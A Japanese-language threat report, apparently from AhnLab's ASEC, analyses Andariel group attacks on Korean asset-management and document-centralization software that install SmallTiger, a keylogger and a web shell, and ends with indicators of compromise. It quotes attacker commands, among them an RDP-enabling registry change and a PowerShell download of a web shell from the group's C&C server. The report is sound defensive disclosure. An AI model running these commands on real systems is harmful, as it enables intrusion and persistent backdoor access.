Posted By ATCP , 2024년 12월 30일

Andariel グループによる韓国国内ソリューションを対象とする攻撃事例の分析 (SmallTiger)

Andariel グループは、過去から韓国国内企業が使用する様々なソフトウェアを攻撃し続けている。[1] 代表的なものに資産管理ソリューション、情報漏えい対策(DLP)ソリューションなどがあり、このほかにも様々なソリューションに対する脆弱性攻撃事例も確認されている。

2024年の下半期にも Andariel グループによる攻撃事例は続いており、主に SmallTiger をインストールしている。[2] 悪用対象のソフトウェアとしては、数年前から悪用されている韓国国内の資産管理ソリューションが代表的であり、このほかにもドキュメントの中央化ソリューションの悪用事例も確認されている。

1. 韓国国内の資産管理ソリューションを対象とする攻撃事例

このソリューションは継続的に攻撃に悪用されており、資産管理ソリューションという特性上、制御サーバーが奪取されたあと、攻撃者がそれを悪用してマルウェアのインストールコマンドを実行する方式と推定される。このような攻撃事例では、主に ModeLoader がインストールされた。

ほかにも、外部に公開されたアップデートサーバーを対象に総当たり攻撃や辞書攻撃を実行して制御権を奪う事例も確認された。当該事例において、攻撃者はアップデートプログラムを SmallTiger に入れ替え、これによって組織内のシステムに SmallTiger を配布しようと試みた。

今回確認された事例では初期侵入方式や具体的な配布方式は確認されていないが、当該資産管理ソリューションのインストールパスに SmallTiger がインストールされ、KeyLogger が同時に使われた。KeyLogger は、同じパスの「MsMpLog.tmp」ファイルにユーザーのキー入力を保存することが特徴である。

図1. キーロガーのデータ

攻撃者はその後、SmallTiger を利用して感染システムに RDP でアクセスできるように設定した。RDP を有効にするために使用される以下のコマンドは、SmallTiger を通じて実行されており、このほかにもバックドアアカウントを追加して隠蔽するための目的で CreateHiddenAccount というオープンソースツールもインストールした。

> reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

図2. SmallTiger を通じて実行された RDP を有効にするコマンド

2. 韓国国内のドキュメントの中央化ソリューションを対象とする攻撃事例

最近では、韓国国内のドキュメントの中央化ソリューションを対象とする攻撃の状況が確認されている。このソリューションで使用する Apache Tomcat Web サーバーは、すべてバージョンが古く、攻撃者は最新のアップデートが行われていないところを対象としているものと推定される。

図3. 韓国国内のドキュメントの中央化ソリューションがインストールされた被害 Web サーバー

攻撃者は初期侵入後にシステムの基本的な情報を照会しており、Advanced Port Scanner がインストールされた履歴も存在する。

> ping 20.20.100.32
> tasklist
> ipconfig /all
> netstat -noa
> whoami

その後は、以下のような PowerShell コマンドで Web シェルをインストールするものと推定される。現在はダウンロードが不可能だが、ダウンロードサーバーである「45.61.148[.]153」は、上記の攻撃事例で確認された SmallTiger の C&C サーバーアドレスでもある。

powershell.exe (New-Object System.Net.WebClient).DownloadFile(‘hxxp://45.61.148[.]153/pizza.jsp’,’C:\*********\web\*********\threadstate.jsp’)

3. 結論

ASEC では最近、SmallTiger を利用した Andariel グループの攻撃事例が再開していることを確認した。攻撃者は、過去から韓国国内の様々なソリューションを悪用したり、脆弱性を攻撃したりしてマルウェアをインストールしている。今回確認された攻撃事例は、以前から継続的に悪用されていた資産管理ソリューションと、新たに確認された韓国国内のドキュメントの中央化ソリューションに対する攻撃である。

企業のセキュリティ担当者は、資産管理ソリューションやドキュメントの中央化ソリューションのような中央集中型管理ソリューションのモニタリングを強化し、プログラムにおけるセキュリティの脆弱性が見つかった場合は、パッチを実行する必要がある。また、OS およびインターネットブラウザ等のプログラムの最新パッチや V3 を最新バージョンにアップデートし、このようなマルウェアの感染を事前に遮断できるよう注意を払うべきである。

IOC 関連情報

MD5

3525a8a16ce8988885d435133b3e85d8

45ef2e621f4c530437e186914c7a9c62

6a58b52b184715583cda792b56a0a1ed

b500a8ffd4907a1dfda985683f1de1df

URL

http[:]//45[.]61[.]148[.]153/pizza[.]jsp

45[.]61[.]148[.]153

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories: APT, マルウェア

Tagged as: CreateHiddenAccount, 資産管理ソリューション, Keylogger, SmallTiger, WebShell